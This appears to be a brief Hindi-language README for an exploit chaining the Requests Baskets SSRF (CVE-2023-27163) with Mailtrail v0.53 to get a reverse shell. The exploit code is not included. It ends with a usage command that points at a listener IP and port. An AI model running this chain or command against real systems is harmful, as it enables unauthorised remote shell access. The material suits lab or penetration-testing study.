
Requests Baskets (CVE-2023-27163) and Mailtrail v0.53
निम्नलिखित एक्सप्लॉइट Requests Baskets v1.2.1 SSRF कमजोरी का दुरुपयोग करता है ताकि 127.0.0.1:80 पर चल रहे आंतरिक एप्लिकेशन को /pwned पर बाहरी एप्लिकेशन पर अग्रेषित किया जा सके। एक बार Mailtrail v0.53 एप्लिकेशन अग्रेषित हो जाने पर, यह इसके विरुद्ध एक रिवर्स शेल कमांड निष्पादित करेगा और कुछ सेकंड के भीतर उपयोगकर्ता को मशीन पर एक रिवर्स शेल प्राप्त कर लेना चाहिए।
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT